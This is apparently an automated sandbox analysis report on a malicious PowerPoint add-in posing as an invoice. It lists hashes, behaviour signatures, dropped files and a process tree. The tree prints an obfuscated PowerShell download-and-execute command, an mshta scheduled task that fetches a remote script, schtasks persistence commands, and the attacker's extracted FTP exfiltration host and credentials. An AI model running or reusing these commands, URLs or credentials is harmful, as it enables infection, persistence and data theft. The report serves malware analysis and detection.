Analysis

  • max time kernel
    83s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    27-09-2022 06:22

General

  • Target

    invoice_6_812937_pdf.ppam

  • Size

    43KB

  • MD5

    63aa8d7cc49200536403df68983a8de1

  • SHA1

    eb7caabc3fb8d4ca3548765f6fc59a03435b6aff

  • SHA256

    f7353ec4f751d69464d3b51344e2283e8a5607eb5c2b66cbb5a6b0102a58f697

  • SHA512

    6c2c6415a9c2ae4a03ccc2ceaf0a4186b46a366c215ade1f2d40ae74146de16f39833cbf5292877f452cfd8814051e1b61586e73e28bac28f35adee0d9c53074

  • SSDEEP

    768:MAzJ/c/lsTsK/n/Okf6R9/i/LxC8vVJOQPdYI+4zrSNJAWWnxmT0gXJ17CfDjraG:MAFkt09fmj7ajB0mxIPgHragw1/K8Nyh

Score
10/10

Malware Config

Extracted

Credentials

  • Protocol:
    ftp
  • Host:
    107.182.129.168
  • Port:
    21
  • Username:
    ffhvfv6
  • Password:
    asasasals

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 3 IoCs
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 9 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates system info in registry 2 TTPs 7 IoCs
  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 10 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 58 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" "C:\Users\Admin\AppData\Local\Temp\invoice_6_812937_pdf.ppam" /ou ""
    1⤵
    • Drops startup file
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1368
    • C:\Windows\SYSTEM32\wscript.exe
      wscript.exe //b //e:jscript C:\\Users\\Public\\sys.ini
      2⤵
      • Process spawned unexpected child process
      • Checks computer location settings
      • Suspicious use of WriteProcessMemory
      PID:4804
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -EP B -C (I'w'r('https://www.mediafire.com/file/0168mlb8ydtjtwx/6.txt/file') -useB) | .('{#}{_}'.replace('_','0').replace('#','1')-f'^#','>').replace('>','I').replace('^','E').replace('#','X') | ping 127.0.0.1
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3728
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\ProgramData\holatyrimakachola\helloitsindian.vbs"
          4⤵
          • Checks computer location settings
          • Drops startup file
          • Modifies registry class
          • Suspicious use of WriteProcessMemory
          PID:3508
          • C:\Windows\System32\WScript.exe
            "C:\Windows\System32\WScript.exe" "C:\ProgramData\holatyrimakachola\JIGIJIGI.vbs"
            5⤵
            • Checks computer location settings
            • Suspicious use of WriteProcessMemory
            PID:3184
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 120 /tn Appligation /F /tr "C:\ProgramData\holatyrimakachola\helloitsindian.vbs"
              6⤵
              • Creates scheduled task(s)
              PID:1672
            • C:\Windows\System32\schtasks.exe
              "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 45 /tn ChromiumPluginupdate /F /tr "C:\ProgramData\holatyrimakachola\ChromeExtentionUpdate.vbs"
              6⤵
              • Creates scheduled task(s)
              PID:2212
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\ProgramData\holatyrimakachola\JIGIJIGI.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4756
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              PowerShell.exe -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\holatyrimakachola\GOLGAPORA.PS1
              6⤵
              • Suspicious use of SetThreadContext
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:3112
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                7⤵
                • Drops file in Drivers directory
                • Accesses Microsoft Outlook profiles
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of SetWindowsHookEx
                • outlook_office_path
                • outlook_win_path
                PID:4188
              • C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
                "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:796
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                  dw20.exe -x -s 784
                  8⤵
                  • Drops file in Windows directory
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2260
              • C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe
                "C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:3268
                • C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                  dw20.exe -x -s 768
                  8⤵
                  • Checks processor information in registry
                  • Enumerates system info in registry
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4560
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\v0340o42\v0340o42.cmdline"
                7⤵
                • Suspicious use of WriteProcessMemory
                PID:100
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                  C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA2D7.tmp" "c:\Users\Admin\AppData\Local\Temp\v0340o42\CSC26C31378D5CE42758DAA4FB6D3FDB.TMP"
                  8⤵
                    PID:4144
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2xqoy0j3\2xqoy0j3.cmdline"
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3540
                  • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBF58.tmp" "c:\Users\Admin\AppData\Local\Temp\2xqoy0j3\CSCFD25DF61181741E8B4DFF8DED76E10F8.TMP"
                    8⤵
                      PID:5040
            • C:\Windows\system32\PING.EXE
              "C:\Windows\system32\PING.EXE" 127.0.0.1
              4⤵
              • Runs ping.exe
              PID:4432
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 100 /tn MicrosoftUpdater /F /tr """Mshta""""""http://www.6fgjfkgjfk.blogspot.com/atom.xml"""
            3⤵
            • Creates scheduled task(s)
            PID:3464

      Network

      MITRE ATT&CK Enterprise v6

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\ProgramData\holatyrimakachola\GOLGAPORA.PS1

        Filesize

        1.1MB

        MD5

        a85604b14ae891a173564321c379d2d6

        SHA1

        8f40e70cc066307bc3f4e41e2ac2d905c0d8e627

        SHA256

        6204b02c519235e891002db408bb11bdfc90a4362e4b7e44aeaa09ed0a199f73

        SHA512

        36273a2f8cc1b4a9efe05d67d3a8584d29537d7c58dd8ee38e6d240f8c55f161d0a042409d52b004edb3e834c8f7c6027a3723104ce9bffc3bc63d8112f5e964

      • C:\ProgramData\holatyrimakachola\JIGIJIGI.bat

        Filesize

        105B

        MD5

        7f53280ea46314479ed1d63b7d9625eb

        SHA1

        9a045c31da18e934b1ca4ce27b72daf0cbbd87fe

        SHA256

        88bc996293478f62bb28814b1787c278a6dc0ed20fe8b11e3f644985b6514459

        SHA512

        275868f4214bc8b874ec857f8938fc35fb77ef025596e1e0cdbea2d231864bec8c4ae09fb557c8dcbe95131c10962cc11744b210f1ec0c111db663fa27a7dbf3

      • C:\ProgramData\holatyrimakachola\JIGIJIGI.vbs

        Filesize

        562B

        MD5

        8ea0ee4f4d6ccbabe4117cdd6f974011

        SHA1

        3271a608993c307046b3185c9a21d434d39fb19c

        SHA256

        cfed6df2d13d6a842032d23d0b12429ca0ddb4ef2bba89f096a05ba44516c620

        SHA512

        5b10ff90b6560956670c85f33266384f4ed401845e137e356ff15e4d613a6a6cc6ff42e68ccde85e0c49d58b7c20f25132ece60a2b60977dd1b3066e59cca61e

      • C:\ProgramData\holatyrimakachola\helloitsindian.vbs

        Filesize

        387B

        MD5

        f0ca1358f7cbc07ffadcdcbb09a8096e

        SHA1

        a1839290fb16f5ccfbcbeec71bcfa4afaa842eaa

        SHA256

        b964c3f6be44ac474f116783e4ca950b909109ff7ea1cf9db9a879a29beeae43

        SHA512

        60fe0ab41793a5fd89a5ffad088a46b0cc8c4db06b8180446e1a4d036c7f81faf35fa726bc9f7b4231b99946ac3c99ae659b4e5a7611e10da2d86344fa620d2c

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

        Filesize

        3KB

        MD5

        556084f2c6d459c116a69d6fedcc4105

        SHA1

        633e89b9a1e77942d822d14de6708430a3944dbc

        SHA256

        88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

        SHA512

        0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

        Filesize

        436B

        MD5

        f623349d8d54ce562bc94277bf8fd87e

        SHA1

        fe58a81115de67a05a54b1b92b42f3d27d021363

        SHA256

        2e7992a3c3ecc9ef98804c75a0d06f5ee0f1cb63d9271cead96c1a0a3e053815

        SHA512

        7f7a35f1aa6c813fc54f6a1f1a51f1c7cfb0cb076e3212444b9efefb1bafeae5db1311c13a8ee8ec396bbd4de760260bdc516e0cbc90b83481745f6ae1124a6b

      • C:\Users\Admin\AppData\Local\Temp\2xqoy0j3\2xqoy0j3.dll

        Filesize

        3KB

        MD5

        675a35effadd15c993c9b54c7902d167

        SHA1

        95a3037f996524c7fb38b1a50490694fa46d7429

        SHA256

        dca56783611675b66f54eceb2e85c09ec73fd20c815f89f13fa4fef7acd2e01c

        SHA512

        c4e0fb977c8900ad11ea5cc8c7976d5059cfc29e80f331ed3d402d5688f107b7cc37be6343da8c82d37841fdab18d4ed3afe6b9f614462c297a3a12cbc1c26e0

      • C:\Users\Admin\AppData\Local\Temp\RESA2D7.tmp

        Filesize

        1KB

        MD5

        3d264449f076b5d3d9ada87b6e3903cb

        SHA1

        48a5da325f763b0978ec66b65bd0a92a9b296b70

        SHA256

        b50cbed1980e7d933b0d79c7b37a753b4f549d1c0995fecf46aafa9eb2c8e71d

        SHA512

        45844f57dc2f1d365899a53c6ab6d6866a6033043581d90e0cad7d7a5f1b804d2a984cf35b950ef28d02f839bd4f05478259820eaaf08cdc2d0336b9ad5b2d09

      • C:\Users\Admin\AppData\Local\Temp\RESBF58.tmp

        Filesize

        1KB

        MD5

        287d854499710e601762adeb41bd1118

        SHA1

        82357906e598c012d3b0cd100dc80196c8c17cf7

        SHA256

        bdb6283ea8811355e4d7fe986c00d444e8121916ab6180193fb9694ab300c900

        SHA512

        cf8e338e7edeb904b78859092bb95aa33d493c9f60f7319ebd644fb94388680f96c8b737c1520ffa43a4a1b2d8362a83e57eea7ec292d81ff93a0eaf97b8ac0d

      • C:\Users\Admin\AppData\Local\Temp\v0340o42\v0340o42.dll

        Filesize

        3KB

        MD5

        892dedb205d7b55a6b0b40d6adf32264

        SHA1

        8c47e352e94d18f63ae33abf8ffba0924c410393

        SHA256

        032c0ac88d5327d4199eb28b29113725f6271f6abbb9cf8efa9c86a70fc8b618

        SHA512

        926fabddaec80fe051cafb47e46852a7c165200fe37b59cfafd0ee0f6e7c2b670854da2bef62c1f8ed9594e37245223ee8054cc97cca30538f3c95703ad16512

      • C:\Users\Public\sys.ini

        Filesize

        2KB

        MD5

        6fc75a2d459b7fcb7fd66e462a56c60f

        SHA1

        0518dc637f9ece1726edea7fb614c2c5518c3cad

        SHA256

        623d3cdf7b82bb7b3e7d3143b02f0e5046505a0f4f87fe20ded1280eb9d0ab99

        SHA512

        e110063ad8aa3fbcae9e4af4473ddf1a2deaa15d0c8f8258eec9b1af7e6fe62181765ffc979f9cddd310740cd6eac2cf8975da95755ac0aacb24eb2f92706382

      • \??\c:\Users\Admin\AppData\Local\Temp\2xqoy0j3\2xqoy0j3.0.cs

        Filesize

        424B

        MD5

        5b0a710c68952a280e3737f249a789bb

        SHA1

        cfd4349b3ebe8232b342fa6667e63d8027fcd26b

        SHA256

        32781e50bffd54bf50e075fc3c5fea9bf02030c8aeb34344cf15592d702973ad

        SHA512

        37efadb9ecade74d0f57bf0c5f5ff254203f952a7b54443433dadbc1e720d294ac6e3694a016520b99747a9856dc523d8a901f209285dba53863dd2e3e64e8ad

      • \??\c:\Users\Admin\AppData\Local\Temp\2xqoy0j3\2xqoy0j3.cmdline

        Filesize

        369B

        MD5

        4886f9d895c61f54c58a00890ff0399b

        SHA1

        7d57c027631589b5a891aedbc9bd6aa51665aebc

        SHA256

        f684e2f1e5fae564cc02ce101c11e67c0382f820e73829d057287a9e4db8b734

        SHA512

        712438792dad774c2067a28f03c1dde9c8e199c8beac6d22e06ca70bc250c10f8a3ce980ae65da57b4718c1bbfc7c9ed94726ea8f4f690f62a9a1070c529a812

      • \??\c:\Users\Admin\AppData\Local\Temp\2xqoy0j3\CSCFD25DF61181741E8B4DFF8DED76E10F8.TMP

        Filesize

        652B

        MD5

        b439d9b048de93e300e78b1c1109e2e5

        SHA1

        74bab01293918a25c7f691c6def0cb875dd7a060

        SHA256

        85360fb32fffe8e99e03e6f61781432661a37e01a57aa7a504e72155c7e3fa13

        SHA512

        ad8acc38be2524fdb00f280f7ae97ca399ea8096367a9c53d4a28ce730c33255451be5c8e2ea03c717227428d69625dedf4aa0a0ec4aa046e371dca733ed867e

      • \??\c:\Users\Admin\AppData\Local\Temp\v0340o42\CSC26C31378D5CE42758DAA4FB6D3FDB.TMP

        Filesize

        652B

        MD5

        0009773f647a897226aadad912c696c0

        SHA1

        94c018c893a31d2f93be2e9a6584f7235dc3d2cc

        SHA256

        8bba67650f51581fb633bb4d60a4ba43a28f26c344da7f45f1564ba75cc29ea5

        SHA512

        4ee2e52b48a303064679ac6241d4d9516ff678059d2ba346850f736ef8645e25bc8b82e27a34690ac511d8f385dddfddb1aed41d33b19de75780c88cb760ddb1

      • \??\c:\Users\Admin\AppData\Local\Temp\v0340o42\v0340o42.0.cs

        Filesize

        424B

        MD5

        d05db7ca65c16470a87f4c4007e9e026

        SHA1

        ab4a5e6b4fbc331c345d88c39239f003f8dd3da7

        SHA256

        c1412a0d2269b59df9d6b003b2f82f9479040dae4c4e12629db5845a6ac4c960

        SHA512

        825d664f3df2ad4ef8b1e501e6a99aaae7d54db59b9308c34ad3d64b07a6792412beded53919ea8bf9e137f4a7e8aa7ac388a036ab256a1cce201a208ef311cb

      • \??\c:\Users\Admin\AppData\Local\Temp\v0340o42\v0340o42.cmdline

        Filesize

        369B

        MD5

        45124ef96315fa0cfe0dc0f53ef5d718

        SHA1

        c65113ec5b4546a638de5f84158b191565eade12

        SHA256

        e4b933cc33a2bcec456708a61388902fccc926925714b02ae4c16fb58a7dbaea

        SHA512

        e640c674f3e3c87823e61ce0adbaf55cb2f77920556472cca2dbb0ff1190f171035f818db623ce8ee46973b0406b39d7012443e68986e469333fbc229915e433

      • memory/796-177-0x0000000074EC0000-0x0000000075471000-memory.dmp

        Filesize

        5.7MB

      • memory/796-174-0x0000000074EC0000-0x0000000075471000-memory.dmp

        Filesize

        5.7MB

      • memory/1368-149-0x00007FFBDCCD0000-0x00007FFBDCCE0000-memory.dmp

        Filesize

        64KB

      • memory/1368-147-0x00007FFBDCCD0000-0x00007FFBDCCE0000-memory.dmp

        Filesize

        64KB

      • memory/1368-132-0x00007FFBDCCD0000-0x00007FFBDCCE0000-memory.dmp

        Filesize

        64KB

      • memory/1368-148-0x00007FFBDCCD0000-0x00007FFBDCCE0000-memory.dmp

        Filesize

        64KB

      • memory/1368-133-0x00007FFBDCCD0000-0x00007FFBDCCE0000-memory.dmp

        Filesize

        64KB

      • memory/1368-138-0x00007FFBDA980000-0x00007FFBDA990000-memory.dmp

        Filesize

        64KB

      • memory/1368-137-0x00007FFBDA980000-0x00007FFBDA990000-memory.dmp

        Filesize

        64KB

      • memory/1368-146-0x00007FFBDCCD0000-0x00007FFBDCCE0000-memory.dmp

        Filesize

        64KB

      • memory/1368-134-0x00007FFBDCCD0000-0x00007FFBDCCE0000-memory.dmp

        Filesize

        64KB

      • memory/1368-135-0x00007FFBDCCD0000-0x00007FFBDCCE0000-memory.dmp

        Filesize

        64KB

      • memory/1368-136-0x00007FFBDCCD0000-0x00007FFBDCCE0000-memory.dmp

        Filesize

        64KB

      • memory/3112-169-0x00007FFBF1DA0000-0x00007FFBF2861000-memory.dmp

        Filesize

        10.8MB

      • memory/3112-159-0x00007FFBF1DA0000-0x00007FFBF2861000-memory.dmp

        Filesize

        10.8MB

      • memory/3112-198-0x00007FFBF1DA0000-0x00007FFBF2861000-memory.dmp

        Filesize

        10.8MB

      • memory/3268-173-0x0000000074EC0000-0x0000000075471000-memory.dmp

        Filesize

        5.7MB

      • memory/3268-176-0x0000000074EC0000-0x0000000075471000-memory.dmp

        Filesize

        5.7MB

      • memory/3728-142-0x0000020FD4420000-0x0000020FD4442000-memory.dmp

        Filesize

        136KB

      • memory/3728-143-0x00007FFBF1DA0000-0x00007FFBF2861000-memory.dmp

        Filesize

        10.8MB

      • memory/3728-162-0x00007FFBF1DA0000-0x00007FFBF2861000-memory.dmp

        Filesize

        10.8MB

      • memory/4188-178-0x0000000005210000-0x00000000052A2000-memory.dmp

        Filesize

        584KB

      • memory/4188-179-0x00000000052B0000-0x0000000005316000-memory.dmp

        Filesize

        408KB

      • memory/4188-175-0x0000000005050000-0x00000000050EC000-memory.dmp

        Filesize

        624KB

      • memory/4188-172-0x0000000005600000-0x0000000005BA4000-memory.dmp

        Filesize

        5.6MB

      • memory/4188-181-0x0000000006B30000-0x0000000006B3A000-memory.dmp

        Filesize

        40KB

      • memory/4188-163-0x0000000000400000-0x0000000000482000-memory.dmp

        Filesize

        520KB

      • memory/4188-180-0x0000000006400000-0x0000000006450000-memory.dmp

        Filesize

        320KB